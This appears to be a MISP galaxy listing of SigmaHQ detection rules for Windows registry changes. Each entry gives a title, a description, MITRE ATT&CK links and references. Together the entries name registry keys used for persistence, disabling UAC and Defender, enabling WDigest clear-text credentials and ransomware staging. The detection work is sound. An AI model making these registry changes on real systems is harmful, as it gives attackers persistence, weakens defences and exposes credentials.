Suspicious Execution Of Renamed Sysinternals Tools - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9326. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml

Potential Persistence Via New AMSI Providers - Registry

Detects when an attacker registers a new AMSI provider in order to achieve persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via New AMSI Providers - Registry"

Table 9327. Table References

Links

https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c

https://persistence-info.github.io/Data/amsi.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml

Potential Persistence Via Logon Scripts - Registry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Logon Scripts - Registry"

Potential Persistence Via Logon Scripts - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 9328. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml

PUA - Sysinternals Tools Execution - Registry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

The tag is: misp-galaxy:sigma-rules="PUA - Sysinternals Tools Execution - Registry"

PUA - Sysinternals Tools Execution - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9329. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Netsh Helper DLL - Registry"

Potential Persistence Via Netsh Helper DLL - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 9330. Table References

Links

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml

New DNS ServerLevelPluginDll Installed

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

The tag is: misp-galaxy:sigma-rules="New DNS ServerLevelPluginDll Installed"

New DNS ServerLevelPluginDll Installed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9331. Table References

Links

https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml

Execution DLL of Choice Using WAB.EXE

This rule detects when the DLL path written in the registry differs from the default one. When launched, WAB.exe tries to load the DLL from the registry.

The tag is: misp-galaxy:sigma-rules="Execution DLL of Choice Using WAB.EXE"

Execution DLL of Choice Using WAB.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9332. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml

http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/

https://twitter.com/Hexacorn/status/991447379864932352

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml

Tamper With Sophos AV Registry Keys

Detects tampering attempts against Sophos AV functionality via registry key modification.

The tag is: misp-galaxy:sigma-rules="Tamper With Sophos AV Registry Keys"

Tamper With Sophos AV Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9333. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml

Potential Persistence Via App Paths Default Property

Detects changes to the "Default" property for keys located under the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry key, which might be used as a method of persistence. The entries found under App Paths are used primarily for the following purposes: first, to map an application's executable file name to that file's fully qualified path; second, to prepend information to the PATH environment variable on a per-application, per-process basis.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via App Paths Default Property"

Potential Persistence Via App Paths Default Property has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 9334. Table References

Links

https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/

https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml

Activate Suppression of Windows Security Center Notifications

Detects Notification_Suppress being set to 1 to disable the Windows Security Center notifications.

The tag is: misp-galaxy:sigma-rules="Activate Suppression of Windows Security Center Notifications"

Activate Suppression of Windows Security Center Notifications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9335. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml

Potential Persistence Via CHM Helper DLL

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via CHM Helper DLL"

Table 9336. Table References

Links

https://persistence-info.github.io/Data/htmlhelpauthor.html

https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml

New ODBC Driver Registered

Detects the registration of a new ODBC driver.

The tag is: misp-galaxy:sigma-rules="New ODBC Driver Registered"

Table 9337. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

The tag is: misp-galaxy:sigma-rules="Potential Persistence Using DebugPath"

Potential Persistence Using DebugPath has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9338. Table References

Links

https://github.com/rootm0s/WinPwnage

https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

The tag is: misp-galaxy:sigma-rules="Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG"

Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9339. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml

CrashControl CrashDump Disabled

Detects the disabling of CrashDump via the registry (as used by HermeticWiper).

The tag is: misp-galaxy:sigma-rules="CrashControl CrashDump Disabled"

CrashControl CrashDump Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9340. Table References

Links

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook rules to run applications or execute macros.

The tag is: misp-galaxy:sigma-rules="Outlook EnableUnsafeClientMailRules Setting Enabled - Registry"

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9341. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44

https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml

Disable UAC Using Registry

Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

The tag is: misp-galaxy:sigma-rules="Disable UAC Using Registry"

Disable UAC Using Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9342. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml

Registry Explorer Policy Modification

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

The tag is: misp-galaxy:sigma-rules="Registry Explorer Policy Modification"

Registry Explorer Policy Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9343. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml

Potential Attachment Manager Settings Associations Tamper

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

The tag is: misp-galaxy:sigma-rules="Potential Attachment Manager Settings Associations Tamper"

Table 9345. Table References

Links

https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465

https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml

CurrentVersion NT Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentVersion NT Autorun Keys Modification"

CurrentVersion NT Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9346. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml

Scripted Diagnostics Turn Off Check Enabled - Registry

Detects the enabling of TurnOffCheck, which can be used to bypass the mitigations for the MSDT Follina vulnerability.

The tag is: misp-galaxy:sigma-rules="Scripted Diagnostics Turn Off Check Enabled - Registry"

Scripted Diagnostics Turn Off Check Enabled - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9348. Table References

Links

https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml

Potential Signing Bypass Via Windows Developer Features - Registry

Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allows the user to install untrusted packages.

The tag is: misp-galaxy:sigma-rules="Potential Signing Bypass Via Windows Developer Features - Registry"

Table 9349. Table References

Links

https://twitter.com/malmoeb/status/1560536653709598721

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml

Session Manager Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Session Manager Autorun Keys Modification"

Session Manager Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 9350. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml

Add Debugger Entry To Hangs Key For Persistence

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence; the configured debugger gets invoked when an application crashes.

The tag is: misp-galaxy:sigma-rules="Add Debugger Entry To Hangs Key For Persistence"

Table 9351. Table References

Links

https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/

https://persistence-info.github.io/Data/wer_debugger.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Policy Tampering"

Table 9352. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml

COM Hijack via Sdclt

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

The tag is: misp-galaxy:sigma-rules="COM Hijack via Sdclt"

COM Hijack via Sdclt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9353. Table References

Links

https://www.exploit-db.com/exploits/47696

http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml

Winlogon Notify Key Logon Persistence

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.

The tag is: misp-galaxy:sigma-rules="Winlogon Notify Key Logon Persistence"

Winlogon Notify Key Logon Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 9354. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml

Blackbyte Ransomware Registry

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

The tag is: misp-galaxy:sigma-rules="Blackbyte Ransomware Registry"

Blackbyte Ransomware Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9355. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/

https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml

CobaltStrike Service Installations in Registry

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement. The same activity can also be caught via System event log ID 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml). In some SIEMs those events can also be found under HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services; however, this rule is based on regular Sysmon events.

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations in Registry"

CobaltStrike Service Installations in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9356. Table References

Links

https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml

Running Chrome VPN Extensions via the Registry 2 VPN Extension

Detects the installation of two Chrome VPN extensions via the registry.

The tag is: misp-galaxy:sigma-rules="Running Chrome VPN Extensions via the Registry 2 VPN Extension"

Running Chrome VPN Extensions via the Registry 2 VPN Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 9357. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Visual Studio Tools for Office"

Potential Persistence Via Visual Studio Tools for Office has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9358. Table References

Links

https://twitter.com/_vivami/status/1347925307643355138

https://vanmieghem.io/stealth-outlook-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml

Wow6432Node CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node CurrentVersion Autorun Keys Modification"

Wow6432Node CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9359. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml

Suspicious Keyboard Layout Load

Detects the preload installation of a suspicious keyboard layout, e.g. a Chinese, Iranian or Vietnamese layout loaded in a user session on systems maintained by US staff only.

The tag is: misp-galaxy:sigma-rules="Suspicious Keyboard Layout Load"

Suspicious Keyboard Layout Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9360. Table References

Links

https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files

https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml

Disable Tamper Protection on Windows Defender

Detects disabling Windows Defender Tamper Protection

The tag is: misp-galaxy:sigma-rules="Disable Tamper Protection on Windows Defender"

Disable Tamper Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9361. Table References

Links

https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml

Wdigest Enable UseLogonCredential

Detects potentially malicious modification of the UseLogonCredential value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials.

The tag is: misp-galaxy:sigma-rules="Wdigest Enable UseLogonCredential"

Wdigest Enable UseLogonCredential has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9362. Table References

Links

https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649

https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials

https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml

Change the Fax Dll

Detects possible persistence via the Fax DLL, which is loaded when the Fax service restarts.

The tag is: misp-galaxy:sigma-rules="Change the Fax Dll"

Change the Fax Dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9363. Table References

Links

https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf

https://twitter.com/dottor_morte/status/1544652325570191361

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml

ETW Logging Disabled For SCM

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled For SCM"

ETW Logging Disabled For SCM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9364. Table References

Links

http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml

Disable PUA Protection on Windows Defender

Detects disabling Windows Defender PUA protection

The tag is: misp-galaxy:sigma-rules="Disable PUA Protection on Windows Defender"

Disable PUA Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9365. Table References

Links

https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml

Persistence Via New SIP Provider

Detects when an attacker registers a new SIP provider for persistence and defense evasion.

The tag is: misp-galaxy:sigma-rules="Persistence Via New SIP Provider"

Persistence Via New SIP Provider has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"

Table 9366. Table References

Links

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

https://github.com/gtworek/PSBits/tree/master/SIP

https://persistence-info.github.io/Data/codesigning.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml

Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Classes Autorun Keys Modification"

Classes Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9367. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml

Potentially Suspicious ODBC Driver Registered

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious ODBC Driver Registered"

Potentially Suspicious ODBC Driver Registered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9368. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml

Disable Microsoft Defender Firewall via Registry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

The tag is: misp-galaxy:sigma-rules="Disable Microsoft Defender Firewall via Registry"

Disable Microsoft Defender Firewall via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9369. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the configured debugger is invoked when an application crashes.

The tag is: misp-galaxy:sigma-rules="Potential Registry Persistence Attempt Via DbgManagedDebugger"

Potential Registry Persistence Attempt Via DbgManagedDebugger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9370. Table References

Links

https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/

https://github.com/last-byte/PersistenceSniper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml

Uncommon Microsoft Office Trusted Location Added

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.

The tag is: misp-galaxy:sigma-rules="Uncommon Microsoft Office Trusted Location Added"

Uncommon Microsoft Office Trusted Location Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9371. Table References

Links

https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml

Disable Privacy Settings Experience in Registry

Detects registry modifications that disable Privacy Settings Experience

The tag is: misp-galaxy:sigma-rules="Disable Privacy Settings Experience in Registry"

Disable Privacy Settings Experience in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9372. Table References

Links

